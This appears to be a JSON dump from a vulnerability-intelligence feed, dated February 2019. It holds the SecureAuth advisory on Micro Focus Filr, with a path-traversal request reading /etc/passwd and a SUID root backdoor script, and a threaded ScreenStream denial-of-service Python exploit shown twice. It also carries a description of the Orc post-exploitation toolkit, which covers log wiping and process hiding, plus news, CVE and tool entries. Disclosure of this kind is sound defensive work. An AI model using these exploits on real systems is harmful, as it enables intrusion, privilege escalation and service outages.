report_fixed_ver(installed_version: version, fixed_version: \"5.0.1\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 4.0, "vector": 
"AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2019-02-22T16:02:28", "bulletinFamily": "exploit", "description": "", "modified": "2019-02-22T00:00:00", "published": "2019-02-22T00:00:00", "id": "EDB-ID:46450", "href": "https://www.exploit-db.com/exploits/46450", "type": "exploitdb", "title": "Micro Focus Filr 3.4.0.217 - Path Traversal / Local Privilege Escalation", "sourceData": "SecureAuth - SecureAuth Labs Advisory\r\nhttp://www.secureauth.com/\r\n\r\nMicro Focus Filr Multiple Vulnerabilities\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Micro Focus Filr Multiple Vulnerabilities\r\nAdvisory ID: SAUTH-2019-0001\r\nAdvisory URL: https://www.secureauth.com/labs/advisories/micro-focus-filr-multiple-vulnerabilities\r\nDate published: 2019-02-20\r\nDate of last update: 2019-02-20\r\nVendors contacted: Micro Focus\r\nRelease mode: Coordinated release\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Path traversal [CWE-22], Permissions, Privileges, and Access\r\nControl [CWE-264]\r\nImpact: Security bypass, Information leak\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: Yes\r\nCVE Name: CVE-2019-3474, CVE-2019-3475\r\n\r\n3. *Vulnerability Description*\r\n\r\nNovell (now part of Micro Focus [1]) website states that:\r\nMicro Focus Filr [2] provides file access and sharing, and lets users\r\naccess their home directories and network folders from desktops, mobile\r\ndevices, and the Web. Users can also synchronize their files to their PC\r\nor Mac. Changes that they make to downloaded copies are kept in sync\r\nwith the originals on their network file servers. And finally, users can\r\nalso share files internally and externally, and those with the share can\r\ncollaborate with each other by commenting on the files.\r\n\r\nA vulnerability was found in the Micro Focus Filr Appliance, which would\r\nallow an attacker with regular user access to read arbitrary files of\r\nthe filesystem. 
Furthermore, a vulnerability in the famtd daemon could\r\nallow a local attacker to elevate privileges.\r\n\r\n4. *Vulnerable Packages*\r\n\r\n. Micro Focus Filr 3.4.0.217.\r\n. Older versions are probably affected too, but they were not checked.\r\n\r\n5. *Vendor Information, Solutions and Workarounds*\r\n\r\nMicro Focus released Filr 3.0 Security Update 6 that addresses the\r\nreported issues: https://download.novell.com/Download?buildid=nZUCSDkvpxk~\r\n\r\nAlso, Micro Focus published the following Security Notes:\r\n\r\n. https://support.microfocus.com/kb/doc.php?id=7023726\r\n. https://support.microfocus.com/kb/doc.php?id=7023727\r\n\r\n6. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Matias Choren\r\nfrom SecureAuth. The publication of this advisory was coordinated by\r\nLeandro Cuozzo from SecureAuth Advisories Team.\r\n\r\n7. *Technical Description / Proof of Concept Code*\r\n\r\n7.1. *Path Traversal*\r\n\r\n[CVE-2019-3474]\r\nThe 'filename' parameter of the '/ssf/f/viewFile' endpoint is vulnerable\r\nto Path Traversal attacks. An authenticated, low-privileged user may be\r\nable to abuse this functionality in order to read arbitrary files on the\r\nfilesystem.\r\n\r\nProof of Concept:\r\n\r\n\r\n1. As an authenticated user, upload a sample PDF file in the 'My Files'\r\nsection.\r\n2. After the upload finishes, click on the small arrow next to the file\r\n-> 'View Details'.\r\n3. The browser will issue a few requests to the web application, one of\r\nthem being the one used for displaying the thumbnail of the file we've\r\njust uploaded. This request has the following structure:\r\n\r\n/-----\r\nGET\r\n/ssf/s/viewFile?binderId=44&entryId=1&entityType=folderEntry&fileId=8a82ada06851d92d016852b727f26b1b&viewType=image&filename=t154758084657912375035546628304890001.jpg\r\n-----/\r\n\r\n4. 
If the 'viewType' parameter is set to 'image', as in this case, we\r\ncan escape the current directory and include arbitrary files, as long as\r\nthey are readable by the 'wwwrun' user (the user Apache Tomcat is\r\ncurrently running as). For example, we could read the '/etc/passwd' file:\r\n\r\n/-----\r\nGET\r\n/ssf/s/viewFile?binderId=44&entryId=1&entityType=folderEntry&fileId=8a82ada06851d92d016852b727f26b1b&viewType=image&filename=../../../../../../../../../../../etc/passwd\r\nHTTP/1.1\r\nHost: 10.2.45.32:8443\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101\r\nFirefox/60.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: JSESSIONID=803689DA9BA5DA9CBA2B7DD246A50531\r\nConnection: close\r\n-----/\r\n\r\n/-----\r\nHTTP/1.1 200 OK\r\nExpires: Thu, 01 Jan 1970 00:00:00 GMT\r\nX-UA-Compatible: IE=Edge\r\nX-Content-Type-Options: nosniff\r\nCache-Control: no-cache\r\nStrict-Transport-Security: max-age=0\r\nX-Frame-Options: SAMEORIGIN\r\nX-XSS-Protection: 1; mode=block\r\nContent-Type: image/jpeg\r\nDate: Mon, 21 Jan 2019 14:53:37 GMT\r\nConnection: close\r\nServer: Filr\r\nContent-Length: 1506\r\n\r\nroot:x:0:0:root:/root:/bin/bash\r\nbin:x:1:1:bin:/bin:/bin/bash\r\n\r\n<...>\r\n-----/\r\n\r\n5. Also, an interesting file to look for would be\r\n'/vastorage/conf/vaconfig.zip'. 
This zip file contains a bunch of\r\ndifferent configuration files, including 'mysql-liquibase.properties'\r\nwhich, among other things, defines connection parameters such as the\r\nusername and password (base64 encoded) for the MySQL database:\r\n\r\n/-----\r\nreferencePassword==?UTF-8?B?Zmlscg==?=\r\nreferenceUrl=jdbc:mysql://localhost:3306/filr?useUnicode=true&characterEncoding=UTF-8\r\nurl=jdbc:mysql://localhost:3306/filr?useUnicode=true&characterEncoding=UTF-8\r\npassword==?UTF-8?B?Zmlscg==?=\r\ndriver=com.mysql.jdbc.Driver\r\nreferenceUsername=filr\r\nreferenceDriver=com.mysql.jdbc.Driver\r\nusername=filr\r\n-----/\r\n\r\n7.2. *Local Privilege Escalation*\r\n\r\n[CVE-2019-3475]\r\nAs per the description: 'novell-famtd provide CIFS & NCP file access\r\nsupport for Filr server to request and respond to HTTP request coming\r\nfrom Filr Client/ Browser'. This daemon runs during startup and can be\r\nabused to elevate privileges on a Filr appliance.\r\n\r\nProof of Concept:\r\n\r\n1. The 'famtd' binary located at '/opt/novell/filr/bin/' and its\r\ncontaining folder are owned by the 'wwwrun' user, as can be seen next:\r\n\r\n/-----\r\nwwwrun@filr:/opt/novell/filr/bin> ls -lha\r\ntotal 196K\r\ndrwxr-x--- 2 wwwrun www 4,0K ene 21 17:22 .\r\ndrwxr-x--- 8 wwwrun www 4,0K ene 14 18:41 ..\r\n-rwxr-x--- 1 wwwrun www 23K feb 8 2017 famtconfig\r\n-rwxr-x--- 1 wwwrun www 117K ene 14 18:19 famtd\r\n-rwxr-x--- 1 wwwrun www 905 feb 8 2017 famt_log_config.sh\r\n-rwxr-x--- 1 wwwrun www 31K jun 21 2018 kablink-teaming-tools.jar\r\nwwwrun@filr:/opt/novell/filr/bin>\r\n-----/\r\n\r\n2. 
This binary is referenced and later executed in the\r\n'/etc/init.d/novell-famtd' init script, meaning that it will run with\r\nroot privileges on startup:\r\n\r\n/-----\r\n#\r\n# /etc/init.d/novell-famtd\r\n#\r\n\r\n<...>\r\n\r\n# Check for missing binaries (stale symlinks should not happen)\r\n# Note: Special treatment of stop for LSB conformance\r\nFAMT_BIN=/opt/novell/filr/bin/famtd\r\n\r\n<...>\r\n\r\n## Start daemon with startproc(8). If this fails\r\n## the return value is set appropriately by startproc.\r\nulimit -c unlimited\r\n/sbin/startproc $FAMT_BIN\r\n\r\n<...>\r\n-----/\r\n\r\n3. If an attacker manages to run arbitrary commands on the Filr\r\nappliance as the 'wwwrun' user, they could replace the\r\n'/opt/novell/filr/bin/famtd' binary with, for example, a custom bash\r\nscript that writes a SUID backdoor on the filesystem:\r\n\r\n/-----\r\n#!/bin/bash\r\n\r\n# C snippet for setting group and user identity to 'root'\r\nFILE=\"/tmp/exp.c\"\r\n\r\n/bin/cat <<EOM >$FILE\r\n#include <unistd.h>\r\n\r\nint main(void) {\r\n setgid(0);\r\n setuid(0);\r\n setegid(0);\r\n execl(\"/bin/bash\", \"bash\", 0);\r\n}\r\nEOM\r\n\r\n# Compile it\r\ngcc /tmp/exp.c -o /tmp/exp\r\n\r\n# Set suid bit\r\nchmod -c 4755 /tmp/exp\r\n\r\n# Call the original famtd daemon\r\n/opt/novell/filr/bin/famtd.back\r\n-----/\r\n\r\n4. After a server reboot, we can run '/tmp/exp' and get root privileges\r\non the server:\r\n\r\n/-----\r\nwwwrun@filr:/tmp> id\r\nuid=30(wwwrun) gid=8(www) groups=8(www)\r\nwwwrun@filr:/tmp> ls -lha\r\ntotal 96K\r\ndrwxrwxrwt 18 root root 4,0K ene 21 17:15 .\r\ndrwxr-xr-x 27 root root 4,0K ene 21 14:14 ..\r\n\r\n<...>\r\n\r\n-rwsr-xr-x 1 root root 12K ene 21 17:14 exp\r\n-rw-r--r-- 1 root root 137 ene 21 14:14 exp.c\r\n\r\n<...>\r\n\r\nwwwrun@filr:/tmp> ./exp\r\nfilr:/tmp # id\r\nuid=0(root) gid=0(root) groups=0(root),8(www)\r\nfilr:/tmp #\r\n-----/\r\n\r\n8. 
*Report Timeline*\r\n2019-01-23: SecureAuth sent an initial notification to Micro Focus including a draft advisory.\r\n2019-01-23: Micro Focus acknowledged reception of initial contact.\r\n2019-01-24: Micro Focus confirmed the reported vulnerabilities and\r\ninformed that they were aiming to deliver a patch around mid February.\r\n2019-01-23: SecureAuth thanked Micro Focus for the reply.\r\n2019-02-11: SecureAuth asked for an update.\r\n2019-02-11: Micro Focus replied saying that they were expecting to release the patch by the end of the week.\r\n2019-02-11: SecureAuth proposed to set the publication date for next week.\r\n2019-02-13: Micro Focus confirmed February 20th as the release date.\r\n2019-02-20: Advisory SAUTH-2019-0001 published.\r\n\r\n9. *References*\r\n\r\n[1] https://www.microfocus.com/novell/\r\n[2] https://www.novell.com/documentation/filr-3/filr-overvw/data/what_is_filr.html\r\n\r\n10. *About SecureAuth Labs*\r\n\r\nSecureAuth Labs, the research arm of SecureAuth Corporation, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct research in several important areas of\r\ncomputer security, including identity-related attacks, system\r\nvulnerabilities and cyber-attack planning. Research includes problem\r\nformalization, identification of vulnerabilities, novel solutions and\r\nprototypes for new technologies. We regularly publish security\r\nadvisories, primary research, technical publications, research blogs,\r\nproject information, and shared software tools for public use at\r\nhttp://www.secureauth.com.\r\n\r\n11. 
*About SecureAuth*\r\n\r\nSecureAuth is leveraged by leading companies, their employees, their\r\ncustomers and their partners to eliminate identity-related breaches.\r\nAs a leader in access management, SecureAuth is powering an identity\r\nsecurity revolution by enabling people and devices to intelligently\r\nand adaptively access systems and data, while effectively keeping bad\r\nactors from doing harm. By ensuring the continuous assessment of risk\r\nand enablement of trust, SecureAuth's highly flexible platform makes\r\nit easier for organizations to prevent the misuse of credentials. To\r\nlearn more, visit www.secureauth.com, call (949) 777-6959,\r\nor email us at info@secureauth.com\r\n\r\n12. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2019 SecureAuth, and are\r\nlicensed under a Creative Commons Attribution Non-Commercial Share-Alike\r\n3.0 (United States) License:", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/46450"}, {"lastseen": "2019-02-21T17:50:58", "bulletinFamily": "exploit", "description": "", "modified": "2019-02-21T00:00:00", "published": "2019-02-21T00:00:00", "id": "EDB-ID:46443", "href": "https://www.exploit-db.com/exploits/46443", "type": "exploitdb", "title": "ScreenStream 3.0.15 - Denial of Service", "sourceData": "#!/usr/bin/python\r\n#coding: utf-8\r\n\r\n# ************************************************************************\r\n# * Author: Marcelo V\u00e1zquez (aka s4vitar) *\r\n# * ScreenStream 3.0.15 Remote Denial of Service (DoS) *\r\n# ************************************************************************\r\n\r\n# Exploit Title: ScreenStream 3.0.15 Remote Denial of Service (DoS)\r\n# Date: 2019-02-21\r\n# Exploit Author: Marcelo V\u00e1zquez (aka s4vitar)\r\n# Vendor Homepage: http://mobzapp.com/mirroring/index.html\r\n# Software Link: 
https://play.google.com/store/apps/details?id=info.dvkr.screenstream&hl=en\r\n# Version: <= ScreenStream 3.0.15\r\n# Tested on: Android\r\n\r\nimport sys, requests, threading, signal\r\n\r\ndef handler(signum, frame):\r\n print '\\nFinishing program...\\n'\r\n sys.exit(0)\r\n\r\nif len(sys.argv) != 3:\r\n\tprint \"\\nUsage: python \" + sys.argv[0] + \" <ip_address> <port>\\n\"\r\n\tprint \"Example: python \" + sys.argv[0] + \" 192.168.1.125 8080\\n\"\r\n\tsys.exit(0)\r\n\r\ndef startAttack(url):\r\n\turl_destination = url + '/start-stop'\r\n\theaders = {'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.5', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0', 'Accept': '*/*', 'Referer': url, 'Connection': 'close'}\r\n\r\n\tr = requests.post(url_destination, headers=headers)\r\n\r\nif __name__ == '__main__':\r\n\r\n\tsignal.signal(signal.SIGINT, handler)\r\n\turl = 'http://' + sys.argv[1] + ':' + sys.argv[2]\r\n\r\n\tthreads = []\r\n\r\n\tfor i in xrange(0, 10000):\r\n\t\tt = threading.Thread(target=startAttack, args=(url,))\r\n\t\tthreads.append(t)\r\n\r\n\tfor x in threads:\r\n\t\tx.start()\r\n\r\n\tfor x in threads:\r\n\t\tx.join()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46443"}], "threatpost": [{"lastseen": "2019-02-21T15:59:21", "bulletinFamily": "info", "description": "Popular Windows data compression tool WinRAR has patched a serious 19-year-old security flaw that was discovered on its platform, potentially impacting 500 million users.\n\nThe path-traversal vulnerability, which WinRAR fixed in January, could allow bad actors to remotely execute malicious code on victims\u2019 machines \u2013 simply by persuading them to open a file, researchers with Check Point Software [said on Wednesday](<https://research.checkpoint.com/extracting-code-execution-from-winrar/>).\n\n\u201cWe found a logical bug using the WinAFL fuzzer and exploited it in WinRAR to gain 
full control over a victim\u2019s computer,\u201d said Nadav Grossman with Check Point in the analysis. \u201cThe exploit works by just extracting an archive, and puts over 500 million users at risk. This vulnerability has existed for over 19 years(!) and forced WinRAR to completely drop support for the vulnerable format.\u201d\n\nWinRAR is a popular file-archiving utility for Windows, which can create and allow viewing of archives in Roshal Archive Compressed (RAR) or ZIP file formats, and unpack numerous archive file formats.\n\nResearchers specifically found a path-traversal vulnerability in unacev2.dll, a third-party dynamic link library in WinRAR used for parsing ACE (a data compression archive file format) archives.\n\nA path-traversal attack allows attackers to access directories that they should not be accessing, like config files or other files containing server data that is not intended for the public.\n\nWhen taking a closer look at unacev2.dll, researchers found that \u201cit\u2019s an old dated dll compiled in 2006 without a protection mechanism. In the end, it turned out that we didn\u2019t even need to bypass them,\u201d said Grossman.\n\nDue to the lack of protections and support for unacev2.dll, researchers were able to easily rename an ACE file and give it a RAR extension within unacev2.dll. 
When opened by WinRAR, the fake ACE file containing a malicious program is extracted to the system\u2019s startup folder \u2013 so the program would automatically begin running when the system starts.\n\nUltimately, if a bad actor used spear-phishing tactics to send an unknowing victim a disguised ACE file, and the victim opened the file in WinRAR, the file would automatically extract in the victim\u2019s startup folder and malware could then be quickly planted on the system.\n\nThe video below shows the proof-of-concept (PoC).\n\nThe PoC makes use of a chain of vulnerabilities (CVE-2018-20250, CVE-2018-20251, CVE-2018-20252, CVE-2018-20253).\n\nAfter researchers informed WinRAR of the issue, the vulnerability was patched in a new version of the software on Jan. 28, [5.70 beta 1](<https://www.win-rar.com/singlenewsview.html?&L=0&tx_ttnews%5Btt_news%5D=111&cHash=7e2fd80e7b9daad5a224dc7cedbcefcb>).\n\nA WinRAR spokesperson told Threatpost: \u201cWe have removed support for the ACE file format from WinRAR in the new Beta version 5.70.\u201d\n\nOn an update on its website, [WinRAR said](<https://www.win-rar.com/whatsnew.html?&L=0>): \u201cWinRAR used this third-party library to unpack ACE archives. unacev2.dll had not been updated since 2005 and we do not have access to its source code. So we decided to drop ACE archive format support to protect security of WinRAR users.\u201d\n\nFile-compression flaws have piqued the interest of exploit vendors such as Zerodium, who earlier last year offered up $10,000 for zero-day vulnerabilities in WinRAR and other compression platforms.\n\n> We're still paying up to $100,000 for [#0day](<https://twitter.com/hashtag/0day?src=hash&ref_src=twsrc%5Etfw>) exploits (code execution) affecting major file archivers: WinRAR, 7-Zip, WinZip (on Windows) or tar (on Linux). 
For more information: <https://t.co/fKnggJyb0H> [#BigBounties](<https://twitter.com/hashtag/BigBounties?src=hash&ref_src=twsrc%5Etfw>)\n> \n> \u2014 Zerodium (@Zerodium) [October 18, 2018](<https://twitter.com/Zerodium/status/1052984615139340288?ref_src=twsrc%5Etfw>)\n", "modified": "2019-02-21T10:05:45", "published": "2019-02-21T10:05:45", "id": "THREATPOST:2A0DE8F2CA2D7EF6DCC4644E21CEF4FA", "href": "https://threatpost.com/winrar-flaw-500-million-users/142080/", "type": "threatpost", "title": "19-Year-Old WinRAR Flaw Plagues 500 Million Users", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "n0where": [{"lastseen": "2019-02-21T07:10:43", "bulletinFamily": "tools", "description": "ClusterFuzz is a scalable fuzzing infrastructure which finds security and stability issues in software. It is used by Google for fuzzing the Chrome Browser, and serves as the fuzzing backend for [ OSS-Fuzz ](<https://github.com/google/oss-fuzz>) . \n\nClusterFuzz provides many features which help seamlessly integrate fuzzing into a software project\u2019s development process: \n\n * Highly scalable. Google\u2019s internal instance runs on over 25,000 machines. \n * Accurate deduplication of crashes. \n * Fully automatic bug filing and closing for issue trackers ( [ Monorail ](<https://opensource.google.com/projects/monorail>) only for now). \n * Testcase minimization. \n * Regression finding through [ bisection ](<https://en.wikipedia.org/wiki/Bisection_\\(software_engineering\\)>) . \n * Statistics for analyzing fuzzer performance, and crash rates. \n * Easy to use web interface for management and viewing crashes. \n * Support for coverage guided fuzzing (e.g. libFuzzer and AFL) and blackbox fuzzing. \n\n## Requirements \n\nMany features of ClusterFuzz depend on [ Google Cloud Platform ](<https://cloud.google.com>) services. However, it\u2019s possible to run it locally without these dependencies for testing purposes. 
While ClusterFuzz runs on a number of platforms, local development is only supported on ** Linux ** and ** macOS **\n\n\n\n## Operation \n\nThe two main components of ClusterFuzz are: \n\n * App Engine instance \n * A pool of [ bots ](<https://google.github.io/clusterfuzz/reference/glossary/#bot>)\n\nThe App Engine instance provides a web interface to access crashes, stats and other information. It\u2019s also responsible for scheduling regular cron jobs. Bots are machines which run scheduled tasks. They lease tasks from platform specific queues. The main tasks that bots run are: \n\n * ` fuzz ` : Run a fuzzing session. \n * ` progression ` : Check if a testcase still reproduces or if it\u2019s fixed. \n * ` regression ` : Calculate the revision range in which a crash was introduced. \n * ` minimize ` : Perform testcase [ minimization ](<https://google.github.io/clusterfuzz/reference/glossary/#minimization>) . \n * ` corpus_pruning ` : Minimize a [ corpus ](<https://google.github.io/clusterfuzz/reference/glossary/#corpus>) to smallest size based on coverage (libFuzzer only). \n * ` analyze ` : Run a manually uploaded testcase against a job to see if it crashes. \n\n### Bots \n\nThere are 2 kinds of bots on ClusterFuzz \u2013 preemptible and non-preemptible. \n\nPreemptible means that the machine can shutdown at any time. On these machines we only run ` fuzz ` task. These machines are often cheaper on cloud providers, so it\u2019s recommended to scale using these machines. \n\nNon-preemptible machines are not expected to shutdown. They are able to run all tasks (including ` fuzz ` ) and other critical tasks such as ` progression ` which must run uninterrupted. 
\n\n[  ](<https://google.github.io/clusterfuzz/>)\n\n[  ](<https://github.com/google/clusterfuzz>)\n", "modified": "2019-02-21T03:51:49", "published": "2019-02-21T03:51:49", "id": "N0WHERE:173092", "href": "https://n0where.net/scalable-fuzzing-infrastructure-clusterfuzz", "title": "Scalable Fuzzing Infrastructure: ClusterFuzz", "type": "n0where", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-21T07:10:58", "bulletinFamily": "tools", "description": "Orc is a simple post-exploitation written in bash. I wrote this because I myself needed a more featureful post-exploitation toolkit for Linux. It\u2019s part of a larger bundle of scripts and tools, but I\u2019ll add those as I write and re-write them. \n\nIt takes the form of an ENV script, so load orc into a shell by running ENV=o.rc sh -i (it does need an interactive shell, I\u2019m afraid) You can also source it, but that seems to require a CTRL+C, otherwise it hangs. I should probably investigate that. \n\nIt creates a directory (.q) in /dev/shm, and all of the output of commands etc tend to go in there. It will also auto-delete this directory on exit. HISTFILE is unset, and we use ulimit -c 0 to try and prevent any corefiles showing up. \n\nIt also contains a relatively decent selection of useful functions: some are currently not super featureful, and there\u2019s likely to be a large number of bugs, but you can find the vast majority of them by running the command \u2018gethelp\u2019. HOWEVER. An overview: \n\n * getenum takes the versions from the kernel, glibc, and dbus. For privilege escalation exploits, they\u2019re usually the ones you want. It also prints the init system, because it\u2019s good to know that. \n * getinfo pulls basically everything useful and generic i could think of and sticks it in a tar.xz file for you. \n * getrel prints the OS name from the release file \n * getip uses HTTP and DNS to get your external IP. 
It aims to use curl and dig, but will fall back to wget and host if it needs to. It grabs these from Akami and Google respectively to try and avoid using smaller sites that might flag in a SOC\u2019s logs or alerts. \n * getjail does a check to see if we\u2019re in a chroot, and then does some very basic checks for hypervisors/virtualisation. If there are any better checks, let me know. \n * getsec checks for the presence of SELinux, AppArmor, and GrSec. I thought about adding stuff for rkhunter/chkrootkit, but in my experience they\u2019re not much of a threat unless you\u2019re using rootkits from 2003. \n * getuser gets all users with a shell \n * getpty pops a pty using script. This pty should have Orc already loaded. \n * getidle gives you an accurate idle time for ptys, letting you see how recently other users have been active. \n * getnet is a monstrous attempt to auto-enumerate living hosts on the network. It\u2019s probably broken, probably lacks anything good or right, and does use ping, so yeah. \n * getuservices gets all processes running by users who don\u2019t have a shell. Useful. \n * portscan should be fairly self-evident. It checks for the following open ports on one host: 21, 22, 23, 80, 443, 8080, 8443, 129, 445, 3389, 3306 \n * prochide grabs the longest process name from ps (because we can\u2019t hide arguments, but we can choose something that makes them relatively invisible in the noise) and uses that as the $0 of whatever you execute \n * srm is just a wrapper around shred, basically \n * qsu uses an ASKPASS script to launch sudo without requiring a tty. Apply arguments as usual to sudo. \n * qssh uses an ASKPASS script to launch ssh without requiring a tty. Apply arguments as usual. \n * wiper uses utmpdump to dump wtmp into plaintext and then greps out the string given as an argument. It then repacks the modified file into /var/log/wtmp, and ensures that the file is nicely timestomped. \n * fpssh is just a wrapper around ssh-keyscan. 
\n * stomp is just an alias for \u201ctouch -r\u201d \n * tools checks for common tools \n * dropsuid basically drops a tiny SUID shell written in ASM wherever. You\u2019ll need to chmod a+sx it. \n * memexec uses some janky perl (see [ https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html ](<https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html>) who I stole much of the basis of it for) to execute a binary in-memory. No arguments or anything yet, and only x64 supported. \n * getdbus lists all dbus services for delicious priv-esc \n * getescape attempts to find a way to escape a chroot by traversing a poorly configured /proc/ \n\n[  ](<https://github.com/zMarch/Orc>)\n", "modified": "2019-02-21T03:15:12", "published": "2019-02-21T03:15:12", "id": "N0WHERE:173085", "href": "https://n0where.net/post-exploitation-framework-for-linux-written-in-bash-orc", "title": "Post-Exploitation Framework for Linux Written in Bash: Orc", "type": "n0where", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2019-02-22T11:45:13", "bulletinFamily": "NVD", "description": "A memory leak in the kernel_read_file function in fs/exec.c in the Linux kernel through 4.20.11 allows attackers to cause a denial of service (memory consumption) by triggering vfs_read failures.", "modified": "2019-02-21T09:35:05", "published": "2019-02-21T00:29:01", "id": "CVE-2019-8980", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-8980", "title": "CVE-2019-8980", "type": "cve", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2019-02-22T10:53:56", "bulletinFamily": "exploit", "description": "", "modified": "2019-02-21T00:00:00", "published": "2019-02-21T00:00:00", "id": "PACKETSTORM:151797", "href": "https://packetstormsecurity.com/files/151797/ScreenStream-3.0.15-Denial-Of-Service.html", "title": "ScreenStream 3.0.15 Denial Of Service", "type": "packetstorm", 
"sourceData": "`#!/usr/bin/python \n#coding: utf-8 \n \n# ************************************************************************ \n# * Author: Marcelo VA!zquez (aka s4vitar) * \n# * ScreenStream 3.0.15 Remote Denial of Service (DoS) * \n# ************************************************************************ \n \n# Exploit Title: ScreenStream 3.0.15 Remote Denial of Service (DoS) \n# Date: 2019-02-21 \n# Exploit Author: Marcelo VA!zquez (aka s4vitar) \n# Vendor Homepage: http://mobzapp.com/mirroring/index.html \n# Software Link: https://play.google.com/store/apps/details?id=info.dvkr.screenstream&hl=en \n# Version: <= ScreenStream 3.0.15 \n# Tested on: Android \n \nimport sys, requests, threading, signal \n \ndef handler(signum, frame): \nprint '\\nFinishing program...\\n' \nsys.exit(0) \n \nif len(sys.argv) != 3: \nprint \"\\nUsage: python \" + sys.argv[0] + \" <ip_address> <port>\\n\" \nprint \"Example: python \" + sys.argv[0] + \" 192.168.1.125 8080\\n\" \nsys.exit(0) \n \ndef startAttack(url): \nurl_destination = url + '/start-stop' \nheaders = {'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.5', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0', 'Accept': '*/*', 'Referer': url, 'Connection': 'close'} \n \nr = requests.post(url_destination, headers=headers) \n \nif __name__ == '__main__': \n \nsignal.signal(signal.SIGINT, handler) \nurl = 'http://' + sys.argv[1] + ':' + sys.argv[2] \n \nthreads = [] \n \nfor i in xrange(0, 10000): \nt = threading.Thread(target=startAttack, args=(url,)) \nthreads.append(t) \n \nfor x in threads: \nx.start() \n \nfor x in threads: \nx.join() \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/151797/screenstream3015-dos.txt"}, {"lastseen": "2019-02-22T10:53:56", "bulletinFamily": "exploit", "description": "", "modified": "2019-02-21T00:00:00", "published": "2019-02-21T00:00:00", "id": "PACKETSTORM:151789", 
"href": "https://packetstormsecurity.com/files/151789/WordPress-Village-5.0-CSRF-Backdoor-SQL-Injection.html", "title": "WordPress Village 5.0 CSRF / Backdoor / SQL Injection", "type": "packetstorm", "sourceData": "`#################################################################### \n \n# Exploit Title : WordPress Village Themes 5.0 CSRF / Backdoor Access / SQL Injection Vulnerability \n# Author [ Discovered By ] : KingSkrupellos \n# Team : Cyberizm Digital Security Army \n# Date : 20/02/2019 \n# Vendor Homepage : themeforest.net/user/themeprovince/portfolio \n# Software Information Link : themeforest.net/item/village-a-responsive-fullscreen-wordpress-theme/237812 \n# Software Version : WordPress 4.2, WordPress 4.1, WordPress 4.0 and 5.0 \n+ Compatible with WPML, WooCommerce 2.2.x \n# Software Price : 59$ \n# Tested On : Windows and Linux \n# Category : WebApps \n# Exploit Risk : Low / Medium \n# Google Dorks : inurl:''/wp-content/themes/village/'' \n# Vulnerability Type : CWE-89 [ Improper Neutralization of \nSpecial Elements used in an SQL Command ('SQL Injection') ] \nCWE-352 [ Cross-Site Request Forgery (CSRF) ] \nCWE-264 [ Permissions, Privileges, and Access Controls ] \nCWE-434 [ Unrestricted Upload of File with Dangerous Type ] \n# PacketStormSecurity : packetstormsecurity.com/files/authors/13968 \n# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ \n# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos \n \n#################################################################### \n \n# Description about Software : \n*************************** \nVillage has an awesome gallery manager that allows you to upload 100s of photos \n \nin just a few clicks. Gallery thumbnails can be portrait or landscape. \n \nVillage allows you to display awesome jQuery walls with ease. \n \nWith Village you can assign a different background or slideshow to each post/page/portfolio. 
\n \n#################################################################### \n \n# Impact : \n*********** \n* WordPress Village Themes 5.0 and other versions - \n \ncomponent for Joomla is prone to an SQL-injection vulnerability because it \n \nfails to sufficiently sanitize user-supplied data before using it in an SQL query. \n \nExploiting this issue could allow an attacker to compromise the application, \n \naccess or modify data, or exploit latent vulnerabilities in the underlying database. \n \nA remote attacker can send a specially crafted request to the vulnerable application \n \nand execute arbitrary SQL commands in application`s database. \n \nFurther exploitation of this vulnerability may result in unauthorized data manipulation. \n \nAn attacker can exploit this issue using a browser. \n \n* This software is prone to a cross-site request-forgery \n \nvulnerability due to insufficient CSRF protection. \n \nAn attacker can exploit this issue to perform certain unauthorized actions \n \nand gain access to the affected application. Other attacks are also possible. \n \nThe web application does not, or can not, sufficiently verify whether a \n \nwell-formed, valid, consistent request was intentionally provided by the user \n \nwho submitted the request. \n \n* The software allows the attacker to upload or transfer files of \n \ndangerous types that can be automatically processed within the product's environment. \n \n* Weaknesses in this category are related to the management of permissions, privileges, \n \nand other security features that are used to perform access control. 
